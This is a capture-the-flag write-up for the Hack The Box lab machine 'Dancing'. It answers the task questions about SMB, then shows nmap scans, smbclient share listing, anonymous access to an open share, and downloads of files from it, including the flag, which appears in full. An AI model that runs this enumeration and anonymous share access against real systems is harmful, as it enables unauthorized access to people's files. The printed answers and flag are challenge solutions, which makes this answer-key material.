Dancing
What does the 3-letter acronym SMB stand for?
Server Message Block
What port does SMB operate on?
445
What network communication model does SMB use, architecturally speaking?
client-server model
What is the service name for port 445 that came up in our nmap scan?
➜ kali nmap -sC -sV -p445 -Pn 10.129.159.248
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-15 08:10 EST
Nmap scan report for 10.129.159.248
Host is up.
PORT STATE SERVICE VERSION
445/tcp filtered microsoft-ds
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.58 seconds
microsoft-ds
What is the tool we use to connect to SMB shares from our Linux distribution?
smbclient
What is the flag or switch we can use with the SMB tool to list the contents of the share?
-L
What is the name of the share we are able to access in the end?
WorkShares
What is the command we can use within the SMB shell to download the files we find?
get
Submit root flag
➜ nmap -sC -sV -p- -T4 -Pn 10.129.140.230
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-22 08:09 EST
Nmap scan report for 10.129.140.230 (10.129.140.230)
Host is up (0.24s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 3h59m59s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-12-22T17:23:45
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 849.55 seconds
➜ smbclient -L ////10.129.140.230//
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
SMB1 disabled -- no workgroup available
➜ smbclient \\\\10.129.140.230\\WorkShares
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Mar 29 04:22:01 2021
.. D 0 Mon Mar 29 04:22:01 2021
Amy.J D 0 Mon Mar 29 05:08:24 2021
James.P D 0 Thu Jun 3 04:38:03 2021
5114111 blocks of size 4096. 1728838 blocks available
smb: \> cd Amy.J\
smb: \Amy.J\> ls
. D 0 Mon Mar 29 05:08:24 2021
.. D 0 Mon Mar 29 05:08:24 2021
worknotes.txt A 94 Fri Mar 26 07:00:37 2021
5114111 blocks of size 4096. 1728838 blocks available
smb: \Amy.J\> get worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \Amy.J\> cd ..
smb: \> cd James.P\
smb: \James.P\> ls
. D 0 Thu Jun 3 04:38:03 2021
.. D 0 Thu Jun 3 04:38:03 2021
flag.txt A 32 Mon Mar 29 05:26:57 2021
5114111 blocks of size 4096. 1748693 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \James.P\> exit
➜ cat flag.txt
5f61c10dffbc77a704d76016a22f1664#
➜ cat worknotes.txt
- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing #
HTB{5f61c10dffbc77a704d76016a22f1664}
This post is licensed under CC BY 4.0 by the author.